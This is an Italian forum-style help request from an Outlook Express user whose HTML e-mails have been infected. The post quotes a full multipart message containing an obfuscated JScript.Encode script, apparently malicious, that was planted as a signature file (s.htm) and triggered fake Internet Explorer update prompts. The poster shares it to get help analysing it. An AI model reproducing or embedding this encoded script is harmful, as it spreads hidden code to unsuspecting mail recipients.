Ho ricevuto da un cliente un'e-mail senza allegati ed in formato html.
Mi accorgo che visualizzando l'anteprima, nella barra inferiore di Outlook Express, viene avviata un'applet java che ricerca un sito.

In alcune occasioni, viene richiesto di installare un programma (con certificato); rifiutando compare una finestra con titolo aggiornamento internet explorer ed un unico tasto (Ok) per l'installazione.

L'email è in multi-part con uno script criptato. Zone Alerm non l'ha intercettata, NAV2003 aggiornato ad oggi non rileva niente, così come Ad-Aware.

Adesso, ogni messaggio che invio (in formato html) viene generato in multi-part con lo script criptato:

------=_NextPart_000_0035_01C33C95.EE1A4AC0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2800.1106" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Questo testo =E8 in formato =
html</FONT></DIV>
<DIV>
<SCRIPT language=3DJScript.Encode>#@~^sQAAAA=3D=3D[Km;s+ =
YRSDbO+^xcJ@!qo]zH2,4+botDxTPUI;'vtOOa)&zSAhZR;2c/xnOcxn)2qyG@$GsR!,xrq*=7F=
x f!WSo9Z?sOo?G!byP*SGsR!196 W=7FB 2Tcds9TUs,ojG!) :*dfYy2uc =
ucOY*zzhR4Yhv,Phb[Y4'!@*@!&qwIzH3@*Ebp+DAAAA=3D=3D^#~@</SCRIPT>
</DIV></BODY></HTML>

Un mio collega ha trovato la soluzione.
Questo script inserisce una firma in outlook express; il file è s.htm che viene aggiunto in c:\windows (almeno su win98).

A quale sito punti e per fare cosa ... questo lo chiedo a voi.

Ciao


------=_NextPart_000_0035_01C33C95.EE1A4AC0--